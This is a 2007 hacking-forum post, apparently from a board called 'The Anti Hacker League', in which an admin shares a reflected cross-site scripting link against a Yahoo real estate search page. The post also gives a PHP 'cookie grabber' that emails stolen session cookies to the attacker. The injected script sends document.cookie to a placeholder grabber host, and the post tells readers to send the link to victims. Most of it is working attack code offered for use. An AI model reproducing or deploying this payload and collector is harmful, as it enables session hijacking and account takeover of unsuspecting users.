The Anti Hacker League !! Forum Index
Author Message
<  Y! Exploits  ~  new xss on yahoo
c0d3krak3r
PostPosted: Sun Jul 08, 2007 6:28 pm  Reply with quote
Site Admin
Site Admin


Joined: 06 Jul 2007
Posts: 129
Location: india

Send cookie script to victim ! attach the cookie script then when
victim clicks on link you have the cookie ! works on IE and YaHOo BETA !
cookie code

Code:
Code:
<div id=yiv1052512133><a target="_blank" rel="nofollow" _
href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.htm
l;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=cl
assified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0&quot;&g
t;&lt;script&gt;location.href='http://www.site.com/grabber.php?email=yourmail@ya
hoo.com&cookie='+escape(document.cookie)&lt;/script&gt;"
>
Click here to see my pictures</a></div>


Cookie Grabber:
Code:
<?php
## Cookie
## ** Removed **
$myemail = $_GET['email'];
$cookie = $_GET['cookie'];
$today = date("l, F j, Y, g:i a") ;
$subject = "Master you have an sucker" ;
$message = "** Removed ** nnDate: $today nnCookie: n$cookie n**
Removed **";
$from = "From: you<yourid@somesite.net>rn";
mail($myemail, $subject, $message, $from);
echo "<meta http-equiv='refresh'
content='1;url=http://www.somesite.net'>";
?>


Change the mail in cookie stealer

_________________
Avinash
Back to top
View user's profile Send private message Visit poster's website Yahoo Messenger
Display posts from previous:   
All times are GMT

View next topic
View previous topic
Page 1 of 1
The Anti Hacker League !! Forum Index  ~  Y! Exploits

Post new topic   Reply to topic


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum




Template: Ad Infinitum